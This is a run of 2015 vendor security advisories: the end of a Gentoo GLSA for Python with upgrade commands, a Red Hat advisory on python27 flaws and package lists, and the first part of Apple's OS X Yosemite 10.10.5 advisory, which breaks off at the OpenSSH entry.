# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-3.3.5-r1"
All Python 2.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/python-2.7.9-r1"
References
==========
[ 1 ] CVE-2013-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1752
[ 2 ] CVE-2013-7338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-7338
[ 3 ] CVE-2014-1912
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-1912
[ 4 ] CVE-2014-2667
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2667
[ 5 ] CVE-2014-4616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4616
[ 6 ] CVE-2014-7185
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-7185
[ 7 ] CVE-2014-9365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9365
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: python27 security, bug fix, and enhancement update
Advisory ID: RHSA-2015:1064-01
Product: Red Hat Software Collections
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1064.html
Issue date: 2015-06-04
CVE Names: CVE-2013-1752 CVE-2013-1753 CVE-2014-1912
CVE-2014-4616 CVE-2014-4650 CVE-2014-7185
=====================================================================
1. Summary:
Updated python27 collection packages that fix multiple security issues and
several bugs are now available as part of Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
3. Description:
Python is an interpreted, interactive, object-oriented programming language
that supports modules, classes, exceptions, high-level dynamic data types,
and dynamic typing. The python27 collection provide a stable release of
Python 2.7 with a number of additional utilities and database connectors
for MySQL and PostgreSQL.
The python27-python packages have been upgraded to upstream version 2.7.8,
which provides numerous bug fixes over the previous version. (BZ#1167912)
The following security issues were fixed in the python27-python component:
It was discovered that the socket.recvfrom_into() function failed to check
the size of the supplied buffer. This could lead to a buffer overflow when
the function was called with an insufficiently sized buffer.
(CVE-2014-1912)
It was discovered that the Python xmlrpclib module did not restrict the
size of gzip-compressed HTTP responses. A malicious XMLRPC server could
cause an XMLRPC client using xmlrpclib to consume an excessive amount of
memory. (CVE-2013-1753)
It was discovered that multiple Python standard library modules
implementing network protocols (such as httplib or smtplib) failed to
restrict the sizes of server responses. A malicious server could cause a
client using one of the affected modules to consume an excessive amount of
memory. (CVE-2013-1752)
It was discovered that the CGIHTTPServer module incorrectly handled URL
encoded paths. A remote attacker could use this flaw to execute scripts
outside of the cgi-bin directory, or disclose the source code of the
scripts in the cgi-bin directory. (CVE-2014-4650)
An integer overflow flaw was found in the way the buffer() function handled
its offset and size arguments. An attacker able to control these arguments
could use this flaw to disclose portions of the application memory or cause
it to crash. (CVE-2014-7185)
The following security issue was fixed in the python27-python and
python27-python-simplejson components:
A flaw was found in the way the json module handled negative index
arguments passed to certain functions (such as raw_decode()). An attacker
able to control the index value passed to one of the affected functions
could possibly use this flaw to disclose portions of the application
memory. (CVE-2014-4616)
In addition, this update adds the following enhancement:
* The python27 Software Collection now includes the python-wheel and
python-pip modules. (BZ#994189, BZ#1167902)
All python27 users are advised to upgrade to these updated packages, which
correct these issues and add these enhancements. All running python27
instances must be restarted for this update to take effect.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
994189 - Please create a python-pip build for the python 2.7 and 3.3 SCL environments on RHEL 6
1046170 - CVE-2013-1753 python: XMLRPC library unrestricted decompression of HTTP responses using gzip enconding
1046174 - CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
1062370 - CVE-2014-1912 python: buffer overflow in socket.recvfrom_into()
1112285 - CVE-2014-4616 python: missing boundary check in JSON module
1113527 - CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
1146026 - CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
1167912 - Update Python in python27 SCL to Python 2.7.8
1170993 - RPM macro rpm/macros.python2.python27 references non-existing /usr/lib/rpm/brp-scl-compress
6. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
python27-1.1-17.el6.src.rpm
python27-python-2.7.8-3.el6.src.rpm
python27-python-pip-1.5.6-5.el6.src.rpm
python27-python-setuptools-0.9.8-3.el6.src.rpm
python27-python-simplejson-3.2.0-2.el6.src.rpm
python27-python-wheel-0.24.0-2.el6.src.rpm
noarch:
python27-python-pip-1.5.6-5.el6.noarch.rpm
python27-python-setuptools-0.9.8-3.el6.noarch.rpm
python27-python-wheel-0.24.0-2.el6.noarch.rpm
x86_64:
python27-1.1-17.el6.x86_64.rpm
python27-python-2.7.8-3.el6.x86_64.rpm
python27-python-debug-2.7.8-3.el6.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm
python27-python-devel-2.7.8-3.el6.x86_64.rpm
python27-python-libs-2.7.8-3.el6.x86_64.rpm
python27-python-simplejson-3.2.0-2.el6.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm
python27-python-test-2.7.8-3.el6.x86_64.rpm
python27-python-tools-2.7.8-3.el6.x86_64.rpm
python27-runtime-1.1-17.el6.x86_64.rpm
python27-scldevel-1.1-17.el6.x86_64.rpm
python27-tkinter-2.7.8-3.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source:
python27-1.1-17.el6.src.rpm
python27-python-2.7.8-3.el6.src.rpm
python27-python-pip-1.5.6-5.el6.src.rpm
python27-python-setuptools-0.9.8-3.el6.src.rpm
python27-python-simplejson-3.2.0-2.el6.src.rpm
python27-python-wheel-0.24.0-2.el6.src.rpm
noarch:
python27-python-pip-1.5.6-5.el6.noarch.rpm
python27-python-setuptools-0.9.8-3.el6.noarch.rpm
python27-python-wheel-0.24.0-2.el6.noarch.rpm
x86_64:
python27-1.1-17.el6.x86_64.rpm
python27-python-2.7.8-3.el6.x86_64.rpm
python27-python-debug-2.7.8-3.el6.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm
python27-python-devel-2.7.8-3.el6.x86_64.rpm
python27-python-libs-2.7.8-3.el6.x86_64.rpm
python27-python-simplejson-3.2.0-2.el6.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm
python27-python-test-2.7.8-3.el6.x86_64.rpm
python27-python-tools-2.7.8-3.el6.x86_64.rpm
python27-runtime-1.1-17.el6.x86_64.rpm
python27-scldevel-1.1-17.el6.x86_64.rpm
python27-tkinter-2.7.8-3.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source:
python27-1.1-17.el6.src.rpm
python27-python-2.7.8-3.el6.src.rpm
python27-python-pip-1.5.6-5.el6.src.rpm
python27-python-setuptools-0.9.8-3.el6.src.rpm
python27-python-simplejson-3.2.0-2.el6.src.rpm
python27-python-wheel-0.24.0-2.el6.src.rpm
noarch:
python27-python-pip-1.5.6-5.el6.noarch.rpm
python27-python-setuptools-0.9.8-3.el6.noarch.rpm
python27-python-wheel-0.24.0-2.el6.noarch.rpm
x86_64:
python27-1.1-17.el6.x86_64.rpm
python27-python-2.7.8-3.el6.x86_64.rpm
python27-python-debug-2.7.8-3.el6.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm
python27-python-devel-2.7.8-3.el6.x86_64.rpm
python27-python-libs-2.7.8-3.el6.x86_64.rpm
python27-python-simplejson-3.2.0-2.el6.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm
python27-python-test-2.7.8-3.el6.x86_64.rpm
python27-python-tools-2.7.8-3.el6.x86_64.rpm
python27-runtime-1.1-17.el6.x86_64.rpm
python27-scldevel-1.1-17.el6.x86_64.rpm
python27-tkinter-2.7.8-3.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
python27-1.1-17.el6.src.rpm
python27-python-2.7.8-3.el6.src.rpm
python27-python-pip-1.5.6-5.el6.src.rpm
python27-python-setuptools-0.9.8-3.el6.src.rpm
python27-python-simplejson-3.2.0-2.el6.src.rpm
python27-python-wheel-0.24.0-2.el6.src.rpm
noarch:
python27-python-pip-1.5.6-5.el6.noarch.rpm
python27-python-setuptools-0.9.8-3.el6.noarch.rpm
python27-python-wheel-0.24.0-2.el6.noarch.rpm
x86_64:
python27-1.1-17.el6.x86_64.rpm
python27-python-2.7.8-3.el6.x86_64.rpm
python27-python-debug-2.7.8-3.el6.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el6.x86_64.rpm
python27-python-devel-2.7.8-3.el6.x86_64.rpm
python27-python-libs-2.7.8-3.el6.x86_64.rpm
python27-python-simplejson-3.2.0-2.el6.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-2.el6.x86_64.rpm
python27-python-test-2.7.8-3.el6.x86_64.rpm
python27-python-tools-2.7.8-3.el6.x86_64.rpm
python27-runtime-1.1-17.el6.x86_64.rpm
python27-scldevel-1.1-17.el6.x86_64.rpm
python27-tkinter-2.7.8-3.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
python27-1.1-20.el7.src.rpm
python27-python-2.7.8-3.el7.src.rpm
python27-python-pip-1.5.6-5.el7.src.rpm
python27-python-setuptools-0.9.8-5.el7.src.rpm
python27-python-simplejson-3.2.0-3.el7.src.rpm
python27-python-wheel-0.24.0-2.el7.src.rpm
noarch:
python27-python-pip-1.5.6-5.el7.noarch.rpm
python27-python-setuptools-0.9.8-5.el7.noarch.rpm
python27-python-wheel-0.24.0-2.el7.noarch.rpm
x86_64:
python27-1.1-20.el7.x86_64.rpm
python27-python-2.7.8-3.el7.x86_64.rpm
python27-python-debug-2.7.8-3.el7.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el7.x86_64.rpm
python27-python-devel-2.7.8-3.el7.x86_64.rpm
python27-python-libs-2.7.8-3.el7.x86_64.rpm
python27-python-simplejson-3.2.0-3.el7.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-3.el7.x86_64.rpm
python27-python-test-2.7.8-3.el7.x86_64.rpm
python27-python-tools-2.7.8-3.el7.x86_64.rpm
python27-runtime-1.1-20.el7.x86_64.rpm
python27-scldevel-1.1-20.el7.x86_64.rpm
python27-tkinter-2.7.8-3.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
python27-1.1-20.el7.src.rpm
python27-python-2.7.8-3.el7.src.rpm
python27-python-pip-1.5.6-5.el7.src.rpm
python27-python-setuptools-0.9.8-5.el7.src.rpm
python27-python-simplejson-3.2.0-3.el7.src.rpm
python27-python-wheel-0.24.0-2.el7.src.rpm
noarch:
python27-python-pip-1.5.6-5.el7.noarch.rpm
python27-python-setuptools-0.9.8-5.el7.noarch.rpm
python27-python-wheel-0.24.0-2.el7.noarch.rpm
x86_64:
python27-1.1-20.el7.x86_64.rpm
python27-python-2.7.8-3.el7.x86_64.rpm
python27-python-debug-2.7.8-3.el7.x86_64.rpm
python27-python-debuginfo-2.7.8-3.el7.x86_64.rpm
python27-python-devel-2.7.8-3.el7.x86_64.rpm
python27-python-libs-2.7.8-3.el7.x86_64.rpm
python27-python-simplejson-3.2.0-3.el7.x86_64.rpm
python27-python-simplejson-debuginfo-3.2.0-3.el7.x86_64.rpm
python27-python-test-2.7.8-3.el7.x86_64.rpm
python27-python-tools-2.7.8-3.el7.x86_64.rpm
python27-runtime-1.1-20.el7.x86_64.rpm
python27-scldevel-1.1-20.el7.x86_64.rpm
python27-tkinter-2.7.8-3.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2013-1752
https://access.redhat.com/security/cve/CVE-2013-1753
https://access.redhat.com/security/cve/CVE-2014-1912
https://access.redhat.com/security/cve/CVE-2014-4616
https://access.redhat.com/security/cve/CVE-2014-4650
https://access.redhat.com/security/cve/CVE-2014-7185
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVcBZ/XlSAg2UNWIIRAojaAKC/1aPfLPbhJulkzyGMdfoFYq3itwCgns9a
lOwtT2ZeE8hH6JpnObD51MU=
=ulrW
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update
2015-006
OS X Yosemite v10.10.5 and Security Update 2015-006 is now available
and addresses the following:
apache
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Apache 2.4.16, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in Apache versions
prior to 2.4.16. These were addressed by updating Apache to version
2.4.16.
CVE-ID
CVE-2014-3581
CVE-2014-3583
CVE-2014-8109
CVE-2015-0228
CVE-2015-0253
CVE-2015-3183
CVE-2015-3185
apache_mod_php
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in PHP 5.5.20, the most
serious of which may lead to arbitrary code execution.
Description: Multiple vulnerabilities existed in PHP versions prior
to 5.5.20. These were addressed by updating Apache to version 5.5.27.
CVE-ID
CVE-2015-2783
CVE-2015-2787
CVE-2015-3307
CVE-2015-3329
CVE-2015-3330
CVE-2015-4021
CVE-2015-4022
CVE-2015-4024
CVE-2015-4025
CVE-2015-4026
CVE-2015-4147
CVE-2015-4148
Apple ID OD Plug-in
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able change the password of a
local user
Description: In some circumstances, a state management issue existed
in password authentication. The issue was addressed through improved
state management.
CVE-ID
CVE-2015-3799 : an anonymous researcher working with HP's Zero Day
Initiative
AppleGraphicsControl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in AppleGraphicsControl which could
have led to the disclosure of kernel memory layout. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2015-5768 : JieTao Yang of KeenTeam
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in
IOBluetoothHCIController. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3779 : Teddy Reed of Facebook Security
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory management issue could have led to the
disclosure of kernel memory layout. This issue was addressed with
improved memory management.
CVE-ID
CVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze
Networks
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious app may be able to access notifications from
other iCloud devices
Description: An issue existed where a malicious app could access a
Bluetooth-paired Mac or iOS device's Notification Center
notifications via the Apple Notification Center Service. The issue
affected devices using Handoff and logged into the same iCloud
account. This issue was resolved by revoking access to the Apple
Notification Center Service.
CVE-ID
CVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security
Lab (Indiana University), Tongxin Li (Peking University), XiaoFeng
Wang (Indiana University)
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with privileged network position may be able to
perform denial of service attack using malformed Bluetooth packets
Description: An input validation issue existed in parsing of
Bluetooth ACL packets. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-3787 : Trend Micro
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: Multiple buffer overflow issues existed in blued's
handling of XPC messages. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2015-3777 : mitp0sh of [PDX]
bootp
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may have
broadcast MAC addresses of previously accessed networks via the DNAv4
protocol. This issue was addressed through disabling DNAv4 on
unencrypted Wi-Fi networks.
CVE-ID
CVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,
University of Oxford (on the EPSRC Being There project)
CloudKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access the iCloud
user record of a previously signed in user
Description: A state inconsistency existed in CloudKit when signing
out users. This issue was addressed through improved state handling.
CVE-ID
CVE-2015-3782 : Deepkanwal Plaha of University of Toronto
CoreMedia Playback
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in CoreMedia Playback.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-5777 : Apple
CVE-2015-5778 : Apple
CoreText
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team
curl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities in cURL and libcurl prior to
7.38.0, one of which may allow remote attackers to bypass the Same
Origin Policy.
Description: Multiple vulnerabilities existed in cURL and libcurl
prior to 7.38.0. These issues were addressed by updating cURL to
version 7.43.0.
CVE-ID
CVE-2014-3613
CVE-2014-3620
CVE-2014-3707
CVE-2014-8150
CVE-2014-8151
CVE-2015-3143
CVE-2015-3144
CVE-2015-3145
CVE-2015-3148
CVE-2015-3153
Data Detectors Engine
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a sequence of unicode characters can lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in processing of
Unicode characters. These issues were addressed through improved
memory handling.
CVE-ID
CVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)
Date & Time pref pane
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Applications that rely on system time may have unexpected
behavior
Description: An authorization issue existed when modifying the
system date and time preferences. This issue was addressed with
additional authorization checks.
CVE-ID
CVE-2015-3757 : Mark S C Smith
Dictionary Application
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with a privileged network position may be able
to intercept users' Dictionary app queries
Description: An issue existed in the Dictionary app, which did not
properly secure user communications. This issue was addressed by
moving Dictionary queries to HTTPS.
CVE-ID
CVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security
Team
DiskImages
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team
dyld
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-3760 : beist of grayhash, Stefan Esser
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-3804 : Apple
CVE-2015-5775 : Apple
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team
groff
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple issues in pdfroff
Description: Multiple issues existed in pdfroff, the most serious of
which may allow arbitrary filesystem modification. These issues were
addressed by removing pdfroff.
CVE-ID
CVE-2009-5044
CVE-2009-5078
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
TIFF images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5758 : Apple
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Visiting a maliciously crafted website may result in the
disclosure of process memory
Description: An uninitialized memory access issue existed in
ImageIO's handling of PNG and TIFF images. Visiting a malicious
website may result in sending data from process memory to the
website. This issue is addressed through improved memory
initialization and additional validation of PNG and TIFF images.
CVE-ID
CVE-2015-5781 : Michal Zalewski
CVE-2015-5782 : Michal Zalewski
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An issue existed in how Install.framework's 'runner'
binary dropped privileges. This issue was addressed through improved
privilege management.
CVE-ID
CVE-2015-5784 : Ian Beer of Google Project Zero
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A race condition existed in
Install.framework's 'runner' binary that resulted in
privileges being incorrectly dropped. This issue was addressed
through improved object locking.
CVE-ID
CVE-2015-5754 : Ian Beer of Google Project Zero
IOFireWireFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Memory corruption issues existed in IOFireWireFamily.
These issues were addressed through additional type input validation.
CVE-ID
CVE-2015-3769 : Ilja van Sprundel
CVE-2015-3771 : Ilja van Sprundel
CVE-2015-3772 : Ilja van Sprundel
IOGraphics
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in IOGraphics. This
issue was addressed through additional type input validation.
CVE-ID
CVE-2015-3770 : Ilja van Sprundel
CVE-2015-5783 : Ilja van Sprundel
IOHIDFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A buffer overflow issue existed in IOHIDFamily. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5774 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in the mach_port_space_info interface,
which could have led to the disclosure of kernel memory layout. This
was addressed by disabling the mach_port_space_info interface.
CVE-ID
CVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,
@PanguTeam
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2015-3768 : Ilja van Sprundel
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A resource exhaustion issue existed in the fasttrap
driver. This was addressed through improved memory handling.
CVE-ID
CVE-2015-5747 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A validation issue existed in the mounting of HFS
volumes. This was addressed by adding additional checks.
CVE-ID
CVE-2015-5748 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute unsigned code
Description: An issue existed that allowed unsigned code to be
appended to signed code in a specially crafted executable file. This
issue was addressed through improved code signature validation.
CVE-ID
CVE-2015-3806 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A specially crafted executable file could allow unsigned,
malicious code to execute
Description: An issue existed in the way multi-architecture
executable files were evaluated that could have allowed unsigned code
to be executed. This issue was addressed through improved validation
of executable files.
CVE-ID
CVE-2015-3803 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute unsigned code
Description: A validation issue existed in the handling of Mach-O
files. This was addressed by adding additional checks.
CVE-ID
CVE-2015-3802 : TaiG Jailbreak Team
CVE-2015-3805 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted plist may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption existed in processing of malformed
plists. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein
(@jollyjinx) of Jinx Germany
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed. This was addressed
through improved environment sanitization.
CVE-ID
CVE-2015-3761 : Apple
Libc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted regular expression may lead
to an unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in the TRE library.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-3796 : Ian Beer of Google Project Zero
CVE-2015-3797 : Ian Beer of Google Project Zero
CVE-2015-3798 : Ian Beer of Google Project Zero
Libinfo
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: Memory corruption issues existed in handling AF_INET6
sockets. These were addressed by improved memory handling.
CVE-ID
CVE-2015-5776 : Apple
libpthread
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling syscalls.
This issue was addressed through improved lock state checking.
CVE-ID
CVE-2015-5757 : Lufeng Li of Qihoo 360
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in libxml2 versions prior
to 2.9.2, the most serious of which may allow a remote attacker to
cause a denial of service
Description: Multiple vulnerabilities existed in libxml2 versions
prior to 2.9.2. These were addressed by updating libxml2 to version
2.9.2.
CVE-ID
CVE-2012-6685 : Felix Groebert of Google
CVE-2014-0191 : Felix Groebert of Google
libxml2
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory access issue existed in libxml2. This was
addressed by improved memory handling
CVE-ID
CVE-2014-3660 : Felix Groebert of Google
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory corruption issue existed in parsing of XML
files. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3807 : Apple
libxpc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling of
malformed XPC messages. This issue was improved through improved
bounds checking.
CVE-ID
CVE-2015-3795 : Mathew Rowley
mail_cmds
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary shell commands
Description: A validation issue existed in the mailx parsing of
email addresses. This was addressed by improved sanitization.
CVE-ID
CVE-2014-7844
Notification Center OSX
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access all
notifications previously displayed to users
Description: An issue existed in Notification Center, which did not
properly delete user notifications. This issue was addressed by
correctly deleting notifications dismissed by users.
CVE-ID
CVE-2015-3764 : Jonathan Zdziarski
ntfs
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in NTFS. This issue
was addressed through improved memory handling.
CVE-ID
CVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze
Networks
OpenSSH
